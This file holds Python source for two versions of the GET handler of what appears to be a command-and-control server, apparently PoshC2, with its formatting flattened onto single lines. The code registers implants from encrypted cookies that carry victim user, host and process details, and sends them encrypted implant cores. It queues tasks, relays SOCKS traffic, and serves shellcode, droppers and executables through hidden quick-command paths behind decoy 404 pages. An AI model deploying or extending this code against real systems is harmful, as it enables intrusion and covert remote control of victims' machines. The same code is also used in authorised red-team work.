def do_GET(self): try: """Respond to a GET request.""" response_content_len = None response_code = 200 response_content_type = "text/html" response_content = None hosted_files = get_hosted_files() webserver_log("GET request,\nPath: %s\nHeaders:\n%s\n" % (str(self.path), str(self.headers))) self.cookieHeader = self.headers.get('Cookie') self.ref = self.headers.get('Referer') UriPath = str(self.path) sharplist = [] for hosted_file in sharpurls: hosted_file = hosted_file.replace(" ", "") hosted_file = hosted_file.replace("\"", "") sharplist.append("/" + hosted_file) self.server_version = ServerHeader self.sys_version = "" if not self.cookieHeader: self.cookieHeader = "NONE" # implant gets a new task new_task = newTask(self.path) if new_task: response_content = new_task elif [ele for ele in sharplist if(ele in UriPath)]: try: webserver_log("%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath)) r = Request("%s%s" % (SocksHost, UriPath), headers={'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent}) res = urlopen(r) sharpout = res.read() response_content_len = len(sharpout) if (len(sharpout) > 0): response_content = sharpout except HTTPError as e: response_code = e.code webserver_log("[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) webserver_log("[-] SharpSocks %s\r\n" % e) except Exception as e: webserver_log("[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) webserver_log("[-] SharpSocks %s\r\n" % e) print(Colours.RED + f"Unknown C2 comms incoming (Could be old implant or sharpsocks) - {self.client_address[0]} {UriPath}" + Colours.END) response_code = 404 HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: response_content = bytes(HTTPResponsePage, "utf-8") else: response_content = bytes(GET_404_Response, "utf-8") # dynamically hosted files elif [ele for ele in hosted_files if(ele.URI in self.path)]: for hosted_file in hosted_files: if hosted_file.URI == self.path or f"/{hosted_file.URI}" == self.path and hosted_file.Active == "Yes": try: response_content = open(hosted_file.FilePath, 'rb').read() except FileNotFoundError as e: print_bad(f"Hosted file not found (src_addr: {self.client_address[0]}): {hosted_file.URI} -> {e.filename}") response_content_type = hosted_file.ContentType if hosted_file.Base64 == "Yes": response_content = base64.b64encode(response_content) # do this for the python dropper only if "_py" in hosted_file.URI: response_content = "a" + "".join("{:02x}".format(c) for c in response_content) response_content = bytes(response_content, "utf-8") # register new implant elif new_implant_url in self.path and self.cookieHeader.startswith("SessionID"): implant_type = "PS" if self.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if self.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if self.path == ("%s?m" % new_implant_url): implant_type = "Python" if self.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if self.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if self.path == ("%s?c" % new_implant_url): implant_type = "C#" if self.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if self.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if self.path == ("%s?j" % new_implant_url): implant_type = "JXA" if self.path == ("%s?e" % new_implant_url): implant_type = "NativeLinux" if self.path == ("%s?p?e" % new_implant_url): implant_type = "NativeLinux Proxy" if implant_type.startswith("C#"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) Domain, User, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), int(URLID)) newImplant.save() newImplant.display() newImplant.autoruns() response_content = encrypt(KEY, newImplant.SharpCore) elif implant_type.startswith("Python"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower(), URLID) newImplant.save() newImplant.display() response_content = encrypt(KEY, newImplant.PythonCore) elif implant_type.startswith("JXA"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Hostname, PID, ProcName, URLID = decCookie.split(";") Domain = Hostname URLID = URLID.replace("\x00", "") URLID = URLID.replace("\x07", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), "x64", PID, str(ProcName).lower(), URLID) newImplant.save() newImplant.display() response_content = encrypt(KEY, newImplant.JXACore) elif implant_type.startswith("NativeLinux"): ProcName = "Linux Dropper" cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), URLID) newImplant.save() newImplant.display() response_content=encrypt(KEY, newImplant.NativeCore) else: try: cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, ProcName, URLID = decCookie.split(";") URLID = URLID.replace("\x00", "") IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, str(ProcName).lower().replace(".exe",""), URLID) newImplant.save() newImplant.display() newImplant.autoruns() response_content = encrypt(KEY, newImplant.PSCore) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() response_code = 404 HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: response_content = bytes(HTTPResponsePage, "utf-8") else: response_content = bytes(GET_404_Response, "utf-8") else: response_code = 404 HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: response_content = bytes(HTTPResponsePage, "utf-8") else: response_content = bytes(GET_404_Response, "utf-8") # send response self.send_response(response_code) self.send_header("Content-type", response_content_type) if response_content_len is not None: self.send_header("Connection", "close") self.send_header("Content-Length", response_content_len) self.end_headers() if response_content is not None: self.wfile.write(response_content) except Exception as e: webserver_log("Error handling GET request: " + str(e)) webserver_log(traceback.format_exc())
def do_GET(self): try: """Respond to a GET request.""" logging.info("GET request,\nPath: %s\nHeaders:\n%s\n", str(self.path), str(self.headers)) new_implant_url = get_newimplanturl() self.cookieHeader = self.headers.get('Cookie') self.ref = self.headers.get('Referer') QuickCommandURI = select_item("QuickCommand", "C2Server") UriPath = str(self.path) sharpurls = get_sharpurls().split(",") sharplist = [] for i in sharpurls: i = i.replace(" ", "") i = i.replace("\"", "") sharplist.append("/" + i) self.server_version = ServerHeader self.sys_version = "" if not self.cookieHeader: self.cookieHeader = "NONE" # implant gets a new task new_task = newTask(self.path) if new_task: self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(new_task) elif [ele for ele in sharplist if (ele in UriPath)]: try: open("%swebserver.log" % PoshProjectDirectory, "a").write( "%s - [%s] Making GET connection to SharpSocks %s%s\r\n" % (self.address_string(), self.log_date_time_string(), SocksHost, UriPath)) r = Request("%s%s" % (SocksHost, UriPath), headers={ 'Accept-Encoding': 'gzip', 'Cookie': '%s' % self.cookieHeader, 'User-Agent': UserAgent }) res = urlopen(r) sharpout = res.read() self.send_response(200) self.send_header("Content-type", "text/html") self.send_header("Connection", "close") self.send_header("Content-Length", len(sharpout)) self.end_headers() if (len(sharpout) > 0): self.wfile.write(sharpout) except HTTPError as e: self.send_response(e.code) self.send_header("Content-type", "text/html") self.send_header("Connection", "close") self.end_headers() open("%swebserver.log" % PoshProjectDirectory, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s\r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e) except Exception as e: open("%swebserver.log" % PoshProjectDirectory, "a").write( "[-] Error with SharpSocks - is SharpSocks running %s%s \r\n%s\r\n" % (SocksHost, UriPath, traceback.format_exc())) open("%swebserver.log" % PoshProjectDirectory, "a").write("[-] SharpSocks %s\r\n" % e) print( Colours.RED + "Error with SharpSocks or old implant connection - is SharpSocks running" + Colours.END) print(Colours.RED + UriPath + Colours.END) self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(GET_404_Response, "utf-8")) elif ("%s_bs" % QuickCommandURI) in self.path: filename = "%spayload.bat" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_rp" % QuickCommandURI) in self.path: filename = "%spayload.txt" % (PayloadsDirectory) with open(filename, 'rb') as f: content = base64.b64encode(f.read()) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_rg" % QuickCommandURI) in self.path: filename = "%srg_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%ss/86/portal" % QuickCommandURI) in self.path: filename = "%sSharp_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%ss/64/portal" % QuickCommandURI) in self.path: filename = "%sSharp_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%sp/86/portal" % QuickCommandURI) in self.path: filename = "%sPosh_v4_x86_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%sp/64/portal" % QuickCommandURI) in self.path: filename = "%sPosh_v4_x64_Shellcode.bin" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = base64.b64encode(content) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_cs" % QuickCommandURI) in self.path: filename = "%scs_sct.xml" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(content) elif ("%s_py" % QuickCommandURI) in self.path: filename = "%saes.py" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() content = "a" + "".join("{:02x}".format(c) for c in content) self.send_response(200) self.send_header("Content-type", "text/plain") self.end_headers() self.wfile.write(bytes(content, "utf-8")) elif ("%s_ex86" % QuickCommandURI) in self.path: filename = "%sPosh32.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "application/x-msdownload") self.end_headers() self.wfile.write(content) elif ("%s_ex64" % QuickCommandURI) in self.path: filename = "%sPosh64.exe" % (PayloadsDirectory) with open(filename, 'rb') as f: content = f.read() self.send_response(200) self.send_header("Content-type", "application/x-msdownload") self.end_headers() self.wfile.write(content) # register new implant elif new_implant_url in self.path and self.cookieHeader.startswith( "SessionID"): implant_type = "PS" if self.path == ("%s?p" % new_implant_url): implant_type = "PS Proxy" if self.path == ("%s?d" % new_implant_url): implant_type = "PS Daisy" if self.path == ("%s?m" % new_implant_url): implant_type = "Python" if self.path == ("%s?d?m" % new_implant_url): implant_type = "Python Daisy" if self.path == ("%s?p?m" % new_implant_url): implant_type = "Python Proxy" if self.path == ("%s?c" % new_implant_url): implant_type = "C#" if self.path == ("%s?d?c" % new_implant_url): implant_type = "C# Daisy" if self.path == ("%s?p?c" % new_implant_url): implant_type = "C# Proxy" if implant_type.startswith("C#"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") Proxy = Proxy.replace("\x00", "") if "\\" in User: User = User[User.index("\\") + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.SharpCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) elif implant_type.startswith("Python"): cookieVal = (self.cookieHeader).replace("SessionID=", "") decCookie = decrypt(KEY, cookieVal) IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) User, Domain, Hostname, Arch, PID, Proxy = decCookie.split( ";") Proxy = Proxy.replace("\x00", "") newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() responseVal = encrypt(KEY, newImplant.PythonCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) else: try: cookieVal = (self.cookieHeader).replace( "SessionID=", "") decCookie = decrypt(KEY.encode("utf-8"), cookieVal) decCookie = str(decCookie) Domain, User, Hostname, Arch, PID, Proxy = decCookie.split( ";") Proxy = Proxy.replace("\x00", "") IPAddress = "%s:%s" % (self.client_address[0], self.client_address[1]) if "\\" in str(User): User = User[str(User).index('\\') + 1:] newImplant = Implant(IPAddress, implant_type, str(Domain), str(User), str(Hostname), Arch, PID, Proxy) newImplant.save() newImplant.display() newImplant.autoruns() responseVal = encrypt(KEY, newImplant.PSCore) self.send_response(200) self.send_header("Content-type", "text/html") self.end_headers() self.wfile.write(responseVal) except Exception as e: print("Decryption error: %s" % e) traceback.print_exc() self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(GET_404_Response, "utf-8")) else: self.send_response(404) self.send_header("Content-type", "text/html") self.end_headers() HTTPResponsePage = select_item("GET_404_Response", "C2Server") if HTTPResponsePage: self.wfile.write(bytes(HTTPResponsePage, "utf-8")) else: self.wfile.write(bytes(GET_404_Response, "utf-8")) except Exception as e: if 'broken pipe' not in str(e).lower(): print_bad("Error handling GET request: " + e) traceback.print_exc()